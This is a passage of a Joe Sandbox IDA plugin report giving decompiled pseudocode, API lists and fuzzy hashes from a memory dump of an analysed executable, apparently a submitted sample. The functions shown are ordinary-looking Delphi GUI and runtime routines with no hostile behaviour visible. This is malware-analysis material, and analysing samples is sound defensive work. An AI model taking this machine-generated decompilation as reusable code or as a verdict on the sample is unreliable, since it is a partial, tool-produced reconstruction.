                                  				intOrPtr _t100;
                                  				intOrPtr _t102;
                                  				intOrPtr _t103;
                                  				intOrPtr _t104;
                                  				intOrPtr _t106;
                                  				struct HWND__* _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t110;
                                  				intOrPtr _t114;
                                  				intOrPtr _t117;
                                  				char _t118;
                                  				intOrPtr _t119;
                                  				void* _t131;
                                  				intOrPtr _t135;
                                  				intOrPtr _t140;
                                  				intOrPtr* _t155;
                                  				void* _t158;
                                  				void* _t165;
                                  				void* _t166;
                                  
                                  				_t155 = __eax;
                                  				if( *0x44fb4c != 0) {
                                  					L3:
                                  					_t49 =  *0x44fb2c; // 0x0
                                  					_t50 =  *0x44fb2c; // 0x0
                                  					_t117 = E00429CE0(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                  					if( *0x44fb4c == 0) {
                                  						_t168 =  *0x44fb50;
                                  						if( *0x44fb50 != 0) {
                                  							_t106 =  *0x44fb40; // 0x0
                                  							_t107 = GetDesktopWindow();
                                  							_t108 =  *0x44fb50; // 0x0
                                  							E00433DA0(_t108, _t107, _t168, _t106);
                                  						}
                                  					}
                                  					_t53 =  *0x44fb2c; // 0x0
                                  					if( *((char*)(_t53 + 0x9b)) != 0) {
                                  						__eflags =  *0x44fb4c;
                                  						_t6 =  &_v24;
                                  						 *_t6 =  *0x44fb4c != 0;
                                  						__eflags =  *_t6;
                                  						 *0x44fb4c = 2;
                                  					} else {
                                  						 *0x44fb4c = 1;
                                  						_v24 = 0;
                                  					}
                                  					_t54 =  *0x44fb30; // 0x0
                                  					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                  						L12:
                                  						_t55 =  *0x44fb30; // 0x0
                                  						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                  						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                  						_t56 =  *0x44fb30; // 0x0
                                  						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                  							_t97 =  *0x44fb30; // 0x0
                                  							E0042BA34( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                  							_t100 =  *0x44fb30; // 0x0
                                  							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                  							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                  						}
                                  						_t131 = E00429D30(2);
                                  						_t121 =  *_t155;
                                  						_t60 =  *0x44fb30; // 0x0
                                  						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                  						if( *0x44fb50 != 0) {
                                  							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                  								_t82 =  *0x44fb50; // 0x0
                                  								E00433D88(_t82, _t158);
                                  								_t84 =  *0x44fb50; // 0x0
                                  								_t177 =  *((char*)(_t84 + 0x6a));
                                  								if( *((char*)(_t84 + 0x6a)) != 0) {
                                  									_t121 =  *((intOrPtr*)(_t155 + 4));
                                  									_t85 =  *0x44fb50; // 0x0
                                  									E00433E88(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                  								} else {
                                  									_t88 = GetDesktopWindow();
                                  									_t121 =  *_t155;
                                  									_t89 =  *0x44fb50; // 0x0
                                  									E00433DA0(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                  								}
                                  							} else {
                                  								_t91 =  *0x44fb50; // 0x0
                                  								E00433EFC(_t91, _t131, __eflags);
                                  								_t93 =  *0x44e0ec; // 0x44fbb4
                                  								SetCursor(E00449250( *_t93, _t158));
                                  							}
                                  						}
                                  						_t62 =  *0x44e0ec; // 0x44fbb4
                                  						_t65 = SetCursor(E00449250( *_t62, _t158));
                                  						if( *0x44fb4c != 2) {
                                  							L32:
                                  							return _t65;
                                  						} else {
                                  							_t179 = _t117;
                                  							if(_t117 != 0) {
                                  								_t118 = E00429D6C(_t121);
                                  								_t67 =  *0x44fb30; // 0x0
                                  								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                  								__eflags = _t118;
                                  								if(__eflags != 0) {
                                  									E0042BA34(_t118,  &_v24, _t155);
                                  									_t65 = E004032D4(_t118, __eflags);
                                  									_t135 =  *0x44fb30; // 0x0
                                  									 *(_t135 + 0x54) = _t65;
                                  								} else {
                                  									_t78 =  *0x44fb30; // 0x0
                                  									_t65 = E004032D4( *((intOrPtr*)(_t78 + 4)), __eflags);
                                  									_t140 =  *0x44fb30; // 0x0
                                  									 *(_t140 + 0x54) = _t65;
                                  								}
                                  							} else {
                                  								_push( *((intOrPtr*)(_t155 + 4)));
                                  								_t80 =  *0x44fb30; // 0x0
                                  								_t65 = E004032D4( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                  							}
                                  							if( *0x44fb30 == 0) {
                                  								goto L32;
                                  							} else {
                                  								_t119 =  *0x44fb30; // 0x0
                                  								_t41 = _t119 + 0x5c; // 0x5c
                                  								_t42 = _t119 + 0x44; // 0x44
                                  								_t65 = E00407900(_t42, 0x10, _t41);
                                  								if(_t65 != 0) {
                                  									goto L32;
                                  								}
                                  								if(_v28 != 0) {
                                  									_t75 =  *0x44fb30; // 0x0
                                  									 *((intOrPtr*)( *_t75 + 0x34))();
                                  								}
                                  								_t72 =  *0x44fb30; // 0x0
                                  								 *((intOrPtr*)( *_t72 + 0x30))();
                                  								_t74 =  *0x44fb30; // 0x0
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								return _t74;
                                  							}
                                  						}
                                  					}
                                  					_t65 = E00429D30(1);
                                  					if( *0x44fb30 == 0) {
                                  						goto L32;
                                  					}
                                  					_t102 =  *0x44fb30; // 0x0
                                  					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                  					_t103 =  *0x44fb30; // 0x0
                                  					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                  					_t104 =  *0x44fb30; // 0x0
                                  					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                  					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                  					_t65 = E00429D30(0);
                                  					if( *0x44fb30 == 0) {
                                  						goto L32;
                                  					}
                                  					goto L12;
                                  				}
                                  				_t110 =  *0x44fb3c; // 0x0
                                  				asm("cdq");
                                  				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x44fb48; // 0x0
                                  				if(_t165 >= 0) {
                                  					goto L3;
                                  				}
                                  				_t114 =  *0x44fb40; // 0x0
                                  				asm("cdq");
                                  				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                  				_t166 = _t65 -  *0x44fb48; // 0x0
                                  				if(_t166 < 0) {
                                  					goto L32;
                                  				}
                                  				goto L3;
                                  			}

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00429E74
                                  • GetDesktopWindow.USER32 ref: 00429F99
                                  • SetCursor.USER32(00000000), ref: 00429FEE
                                    • Part of subcall function 00433EFC: 73451770.COMCTL32(00000000,?,00429FC9), ref: 00433F18
                                    • Part of subcall function 00433EFC: ShowCursor.USER32(000000FF,00000000,?,00429FC9), ref: 00433F33
                                  • SetCursor.USER32(00000000), ref: 00429FD9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Cursor$DesktopWindow$73451770Show
                                  • String ID:
                                  • API String ID: 3513720257-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E004455A8(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				void* _t41;
                                  				void* _t54;
                                  				void* _t61;
                                  				struct HMENU__* _t64;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t79;
                                  				intOrPtr _t81;
                                  				intOrPtr _t83;
                                  				intOrPtr _t87;
                                  				void* _t92;
                                  				intOrPtr _t98;
                                  				void* _t111;
                                  				intOrPtr _t113;
                                  				void* _t116;
                                  
                                  				_t109 = __edi;
                                  				_push(__edi);
                                  				_v20 = 0;
                                  				_t113 = __edx;
                                  				_t92 = __eax;
                                  				_push(_t116);
                                  				_push(0x44576e);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t116 + 0xfffffff0;
                                  				if(__edx == 0) {
                                  					L7:
                                  					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                  					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                  						E0043F0E0(_t39, 0, _t109, 0);
                                  					}
                                  					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                  						_t113 = 0;
                                  					}
                                  					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                  					if(_t113 != 0) {
                                  						E00418F94(_t113, _t92);
                                  					}
                                  					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                  						_t41 = E00432804(_t92);
                                  						__eflags = _t41;
                                  						if(_t41 != 0) {
                                  							SetMenu(E004325A4(_t92), 0);
                                  						}
                                  						goto L30;
                                  					} else {
                                  						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                  							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                  								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                  								if( *((char*)(_t92 + 0x22f)) != 1) {
                                  									_t54 = E00432804(_t92);
                                  									__eflags = _t54;
                                  									if(_t54 != 0) {
                                  										SetMenu(E004325A4(_t92), 0);
                                  									}
                                  								}
                                  								goto L30;
                                  							}
                                  							goto L21;
                                  						} else {
                                  							L21:
                                  							if(E00432804(_t92) != 0) {
                                  								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                  								_t110 = _t61;
                                  								_t64 = GetMenu(E004325A4(_t92));
                                  								_t138 = _t61 - _t64;
                                  								if(_t61 != _t64) {
                                  									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                  									SetMenu(E004325A4(_t92), _t70);
                                  								}
                                  								E0043F0E0(_t113, E004325A4(_t92), _t110, _t138);
                                  							}
                                  							L30:
                                  							if( *((char*)(_t92 + 0x22e)) != 0) {
                                  								E0044666C(_t92, 1);
                                  							}
                                  							E004454E0(_t92);
                                  							_pop(_t98);
                                  							 *[fs:eax] = _t98;
                                  							_push(0x445775);
                                  							return E00403E10( &_v20);
                                  						}
                                  					}
                                  				}
                                  				_t77 =  *0x44fbb4; // 0x2191320
                                  				_t79 = E00448DD8(_t77) - 1;
                                  				if(_t79 >= 0) {
                                  					_v8 = _t79 + 1;
                                  					_t111 = 0;
                                  					do {
                                  						_t81 =  *0x44fbb4; // 0x2191320
                                  						if(_t113 ==  *((intOrPtr*)(E00448DC4(_t81, _t111) + 0x248))) {
                                  							_t83 =  *0x44fbb4; // 0x2191320
                                  							if(_t92 != E00448DC4(_t83, _t111)) {
                                  								_v16 =  *((intOrPtr*)(_t113 + 8));
                                  								_v12 = 0xb;
                                  								_t87 =  *0x44de14; // 0x41a460
                                  								E00405910(_t87,  &_v20);
                                  								E0040B0AC(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                  								E0040384C();
                                  							}
                                  						}
                                  						_t111 = _t111 + 1;
                                  						_t10 =  &_v8;
                                  						 *_t10 = _v8 - 1;
                                  					} while ( *_t10 != 0);
                                  				}
                                  			}
                                  0x00445603
                                  0x00445636
                                  0x00445637
                                  0x00445637
                                  0x00445637
                                  0x004455e1

                                  APIs
                                  • GetMenu.USER32(00000000), ref: 004456CC
                                  • SetMenu.USER32(00000000,00000000), ref: 004456E9
                                  • SetMenu.USER32(00000000,00000000), ref: 0044571E
                                  • SetMenu.USER32(00000000,00000000,00000000,0044576E), ref: 0044573A
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID:
                                  • API String ID: 3688185913-0
                                  • Opcode ID: 497ced4f59bfdb2df4ca461c47bf340e0693dcda4d82c4a2b1d18768c7a79c26
                                  • Instruction ID: 920cb349dc7341c0adb9020d06187e125570e91ed15f9aa72bfd203fe6cf9352
                                  • Opcode Fuzzy Hash: 497ced4f59bfdb2df4ca461c47bf340e0693dcda4d82c4a2b1d18768c7a79c26
                                  • Instruction Fuzzy Hash: 1951CD30A00A00ABEF21AF29C98575A77A59F15318F4544BBEC099B397CE7CCD45875C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040E300(intOrPtr* __eax) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				intOrPtr* _v776;
                                  				signed short* _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				char _v792;
                                  				intOrPtr* _v796;
                                  				signed char _t43;
                                  				intOrPtr* _t60;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t84;
                                  				void* _t85;
                                  				intOrPtr* _t92;
                                  				void* _t96;
                                  				char* _t97;
                                  				void* _t98;
                                  
                                  				_v776 = __eax;
                                  				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                  					E0040E1CC(0x80070057);
                                  				}
                                  				_t43 =  *_v776;
                                  				if((_t43 & 0x00000fff) == 0xc) {
                                  					if((_t43 & 0x00000040) == 0) {
                                  						_v780 =  *((intOrPtr*)(_v776 + 8));
                                  					} else {
                                  						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                  					}
                                  					_v788 =  *_v780 & 0x0000ffff;
                                  					_t79 = _v788 - 1;
                                  					if(_t79 >= 0) {
                                  						_t85 = _t79 + 1;
                                  						_t96 = 0;
                                  						_t97 =  &_v772;
                                  						do {
                                  							_v796 = _t97;
                                  							_push(_v796 + 4);
                                  							_t22 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040D3DC();
                                  							E0040E1CC(_v780);
                                  							_push( &_v784);
                                  							_t25 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040D3E4();
                                  							E0040E1CC(_v780);
                                  							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                  							_t96 = _t96 + 1;
                                  							_t97 = _t97 + 8;
                                  							_t85 = _t85 - 1;
                                  						} while (_t85 != 0);
                                  					}
                                  					_t81 = _v788 - 1;
                                  					if(_t81 >= 0) {
                                  						_t84 = _t81 + 1;
                                  						_t60 =  &_v768;
                                  						_t92 =  &_v260;
                                  						do {
                                  							 *_t92 =  *_t60;
                                  							_t92 = _t92 + 4;
                                  							_t60 = _t60 + 8;
                                  							_t84 = _t84 - 1;
                                  						} while (_t84 != 0);
                                  						do {
                                  							goto L12;
                                  						} while (E0040E2A4(_t83, _t98) != 0);
                                  						goto L15;
                                  					}
                                  					L12:
                                  					_t83 = _v788 - 1;
                                  					if(E0040E274(_v788 - 1, _t98) != 0) {
                                  						_push( &_v792);
                                  						_push( &_v260);
                                  						_push(_v780);
                                  						L0040D3EC();
                                  						E0040E1CC(_v780);
                                  						E0040E4F8(_v792);
                                  					}
                                  				}
                                  				L15:
                                  				_push(_v776);
                                  				L0040CF78();
                                  				return E0040E1CC(_v776);
                                  			}

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E3AF
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E3CB
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E442
                                  • VariantClear.OLEAUT32(?), ref: 0040E46B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction ID: 54b597303299e2a6500ee443c65802fa474a5cc75a31fadfedc6e615001296d4
                                  • Opcode Fuzzy Hash: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction Fuzzy Hash: 8A413175A002198FCB61DB5ACC90BC9B3BCAF48304F0045EAE548F7392D638AF908F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040BF00() {
                                  				char _v152;
                                  				short _v410;
                                  				signed short _t14;
                                  				signed int _t16;
                                  				int _t18;
                                  				void* _t20;
                                  				void* _t23;
                                  				int _t24;
                                  				int _t26;
                                  				signed int _t30;
                                  				signed int _t31;
                                  				signed int _t32;
                                  				signed int _t37;
                                  				int* _t39;
                                  				short* _t41;
                                  				void* _t49;
                                  
                                  				 *0x44f740 = 0x409;
                                  				 *0x44f744 = 9;
                                  				 *0x44f748 = 1;
                                  				_t14 = GetThreadLocale();
                                  				if(_t14 != 0) {
                                  					 *0x44f740 = _t14;
                                  				}
                                  				if(_t14 != 0) {
                                  					 *0x44f744 = _t14 & 0x3ff;
                                  					 *0x44f748 = (_t14 & 0x0000ffff) >> 0xa;
                                  				}
                                  				memcpy(0x44d10c, 0x40c054, 8 << 2);
                                  				if( *0x44d0c4 != 2) {
                                  					_t16 = GetSystemMetrics(0x4a);
                                  					__eflags = _t16;
                                  					 *0x44f74d = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                  					_t18 = GetSystemMetrics(0x2a);
                                  					__eflags = _t18;
                                  					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                  					 *0x44f74c = _t31;
                                  					__eflags = _t31;
                                  					if(__eflags != 0) {
                                  						return E0040BE88(__eflags, _t49);
                                  					}
                                  				} else {
                                  					_t20 = E0040BEE8();
                                  					if(_t20 != 0) {
                                  						 *0x44f74d = 0;
                                  						 *0x44f74c = 0;
                                  						return _t20;
                                  					}
                                  					E0040BE88(__eflags, _t49);
                                  					_t37 = 0x20;
                                  					_t23 = E00402C18(0x44d10c, 0x20, 0x40c054);
                                  					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                  					 *0x44f74c = _t32;
                                  					__eflags = _t32;
                                  					if(_t32 != 0) {
                                  						 *0x44f74d = 0;
                                  						return _t23;
                                  					}
                                  					_t24 = 0x80;
                                  					_t39 =  &_v152;
                                  					do {
                                  						 *_t39 = _t24;
                                  						_t24 = _t24 + 1;
                                  						_t39 =  &(_t39[0]);
                                  						__eflags = _t24 - 0x100;
                                  					} while (_t24 != 0x100);
                                  					_t26 =  *0x44f740; // 0x409
                                  					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                  					_t18 = 0x80;
                                  					_t41 =  &_v410;
                                  					while(1) {
                                  						__eflags =  *_t41 - 2;
                                  						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                  						 *0x44f74d = _t37;
                                  						__eflags = _t37;
                                  						if(_t37 != 0) {
                                  							goto L17;
                                  						}
                                  						_t41 = _t41 + 2;
                                  						_t18 = _t18 - 1;
                                  						__eflags = _t18;
                                  						if(_t18 != 0) {
                                  							continue;
                                  						} else {
                                  							return _t18;
                                  						}
                                  						L18:
                                  					}
                                  				}
                                  				L17:
                                  				return _t18;
                                  				goto L18;
                                  			}

                                  APIs
                                  • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040BFF4
                                  • GetThreadLocale.KERNEL32 ref: 0040BF2A
                                    • Part of subcall function 0040BE88: GetCPInfo.KERNEL32(00000000,?), ref: 0040BEA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: InfoLocaleStringThreadType
                                  • String ID:
                                  • API String ID: 1505017576-0
                                  • Opcode ID: 3b9f9a4303a890bf50e3beaf642cfd9b5bc2a9f3e3cd36154dc9aa29540c40fd
                                  • Instruction ID: 673c4af7e4609a9bf5262c4f47039311d62ae4a8027dd5f7c1ed1ec743a0ee3b
                                  • Opcode Fuzzy Hash: 3b9f9a4303a890bf50e3beaf642cfd9b5bc2a9f3e3cd36154dc9aa29540c40fd
                                  • Instruction Fuzzy Hash: 00316775500345CBE720D765AC423A73B94EB53308F84817BE988AB3C2D73C4849CBAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0041E8BC(intOrPtr __eax, void* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t33;
                                  				struct HDC__* _t47;
                                  				intOrPtr _t54;
                                  				intOrPtr _t58;
                                  				struct HDC__* _t66;
                                  				void* _t67;
                                  				intOrPtr _t76;
                                  				void* _t81;
                                  				intOrPtr _t82;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  
                                  				_t84 = _t86;
                                  				_push(_t67);
                                  				_v8 = __eax;
                                  				_t33 = _v8;
                                  				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                  					return _t33;
                                  				} else {
                                  					E0041CAE4(_v8);
                                  					_push(_t84);
                                  					_push(0x41e99b);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					E0041FBD8( *((intOrPtr*)(_v8 + 0x58)));
                                  					E0041E738( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                  					_t47 = E0041FCD8( *((intOrPtr*)(_v8 + 0x58)));
                                  					_push(0);
                                  					L00405FC8();
                                  					_t66 = _t47;
                                  					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                  					if(_t81 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                  					}
                                  					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                  					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                  					if(_t82 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                  					} else {
                                  						_push(0xffffffff);
                                  						_push(_t82);
                                  						_push(_t66);
                                  						L004060F0();
                                  						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                  						_push(_t66);
                                  						L004060C8();
                                  					}
                                  					E0041CDD8(_v8, _t66);
                                  					_t58 =  *0x44d6d0; // 0x2190acc
                                  					E00413808(_t58, _t66, _t67, _v8, _t82);
                                  					_pop(_t76);
                                  					 *[fs:eax] = _t76;
                                  					_push(0x41e9a2);
                                  					return E0041CC50(_v8);
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0041CAE4: RtlEnterCriticalSection.KERNEL32(0044F8C0,00000000,0041B592,00000000,0041B5F1), ref: 0041CAEC
                                    • Part of subcall function 0041CAE4: RtlLeaveCriticalSection.KERNEL32(0044F8C0,0044F8C0,00000000,0041B592,00000000,0041B5F1), ref: 0041CAF9
                                    • Part of subcall function 0041CAE4: RtlEnterCriticalSection.KERNEL32(00000038,0044F8C0,0044F8C0,00000000,0041B592,00000000,0041B5F1), ref: 0041CB02
                                    • Part of subcall function 0041FCD8: 72E7AC50.USER32(00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD2E
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD43
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD4D
                                    • Part of subcall function 0041FCD8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD71
                                    • Part of subcall function 0041FCD8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD7C
                                  • 72E7A590.GDI32(00000000,00000000,0041E99B), ref: 0041E911
                                  • SelectObject.GDI32(00000000,?), ref: 0041E92A
                                  • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,0041E99B), ref: 0041E953
                                  • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,0041E99B), ref: 0041E95F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                  • String ID:
                                  • API String ID: 2198039625-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043F4CC(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				void* __edi;
                                  				int _t27;
                                  				void* _t40;
                                  				int _t41;
                                  				int _t50;
                                  
                                  				_t50 = _t41;
                                  				_t49 = __edx;
                                  				_t40 = __eax;
                                  				if(E0043EBD8(__eax) == 0) {
                                  					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                  				}
                                  				_v8 = 0;
                                  				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                  					_t27 = GetMenuItemID(_t49, _t50);
                                  					_t51 = _t27;
                                  					if(_t27 != 0xffffffff) {
                                  						_v8 = E0043EA54(_t40, 0, _t51);
                                  					}
                                  				} else {
                                  					_t49 = GetSubMenu(_t49, _t50);
                                  					_v8 = E0043EA54(_t40, 1, _t37);
                                  				}
                                  				if(_v8 == 0) {
                                  					return 0;
                                  				} else {
                                  					 *_a12 = 0;
                                  					E004081E4(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                  					return E00408128(_a12, _t49);
                                  				}
                                  			}











                                  APIs
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0041A010(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                  				struct _WNDCLASSA _v44;
                                  				struct HINSTANCE__* _t6;
                                  				CHAR* _t8;
                                  				struct HINSTANCE__* _t9;
                                  				int _t10;
                                  				void* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t19;
                                  				CHAR* _t20;
                                  				struct HWND__* _t22;
                                  				CHAR* _t24;
                                  
                                  				_t6 =  *0x44f664; // 0x400000
                                  				 *0x44d400 = _t6;
                                  				_t8 =  *0x44d414; // 0x41a000
                                  				_t9 =  *0x44f664; // 0x400000
                                  				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
